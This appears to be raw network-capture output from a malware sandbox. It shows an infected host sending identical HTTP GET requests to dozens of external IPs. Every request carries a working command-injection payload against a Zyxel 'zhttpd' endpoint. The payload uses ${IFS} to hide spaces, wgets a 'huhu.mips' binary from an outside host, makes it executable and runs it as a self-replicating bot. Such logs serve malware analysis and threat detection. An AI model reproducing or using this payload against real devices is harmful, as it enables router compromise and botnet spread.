                                              Jan 29, 2024 07:03:41.842921972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2370192.168.2.1438130210.137.22.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842974901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2371192.168.2.144491843.59.245.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842998981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2372192.168.2.1441962186.220.194.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843036890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2373192.168.2.144433436.200.136.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843066931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2374192.168.2.1438100153.81.135.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843095064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2375192.168.2.1452676213.40.186.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843127012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2376192.168.2.145985841.158.231.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843162060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2377192.168.2.1451538195.43.202.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843214035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2378192.168.2.1443376151.190.149.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843266964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2379192.168.2.144128242.181.117.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843280077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2380192.168.2.1433818213.241.187.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843329906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2381192.168.2.145578677.171.58.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843374968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2382192.168.2.144560698.218.32.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843398094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2383192.168.2.1451226139.155.219.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843458891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2384192.168.2.145151461.226.25.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843482018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2385192.168.2.1437214100.60.149.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843524933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2386192.168.2.1458898116.200.25.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843554974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2387192.168.2.144380069.87.145.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843578100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2388192.168.2.1448916101.78.59.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843620062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2389192.168.2.143871644.183.79.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843656063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2390192.168.2.1456434147.111.25.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843663931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2391192.168.2.1436560134.198.249.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843717098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2392192.168.2.1456430145.188.115.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843767881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2393192.168.2.1446370148.75.223.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843795061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2394192.168.2.145209090.64.8.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843823910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2395192.168.2.1444728216.87.217.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843872070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2396192.168.2.1458120157.28.201.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843918085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2397192.168.2.144478019.237.148.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.843971968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2398192.168.2.1445304167.32.58.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844002962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2399192.168.2.145400482.106.213.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844046116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2400192.168.2.1434402211.116.18.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844074965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2401192.168.2.1444282221.195.120.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844110966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2402192.168.2.1450934119.35.180.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844151020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2403192.168.2.145211046.110.89.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844187975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2404192.168.2.1435556105.89.74.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844232082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2405192.168.2.145825644.145.63.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844242096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2406192.168.2.1437410142.40.145.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844316006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2407192.168.2.143505232.113.167.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844350100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2408192.168.2.1434120150.113.118.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844374895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2409192.168.2.1447322207.206.230.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844422102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2410192.168.2.1459714186.253.70.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844460011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2411192.168.2.145701041.166.187.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844490051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2412192.168.2.1446130172.2.235.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844552040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2413192.168.2.143668467.169.65.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844607115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2414192.168.2.143405681.180.5.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844634056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2415192.168.2.1459492205.183.208.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844674110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2416192.168.2.1444376212.56.20.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844719887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2417192.168.2.1449626147.51.139.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844755888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2418192.168.2.144707087.206.209.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844825029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2419192.168.2.14426442.192.91.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844868898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2420192.168.2.1441144122.131.161.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844890118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2421192.168.2.144395294.25.109.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844942093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2422192.168.2.1454188204.179.251.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.844973087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2423192.168.2.143381453.217.131.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845000029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2424192.168.2.1450160138.42.114.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845031023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2425192.168.2.145597014.206.36.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845066071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2426192.168.2.144864899.96.157.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845132113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2427192.168.2.143836423.217.32.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845153093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2428192.168.2.1458474113.124.11.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845180988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2429192.168.2.143474272.96.54.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845207930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2430192.168.2.1442264202.177.128.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845242977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2431192.168.2.1433992147.196.99.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845288992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2432192.168.2.1446818220.7.192.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.845330000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2433192.168.2.1455220107.117.229.223443
                                              TimestampBytes transferredDirectionData
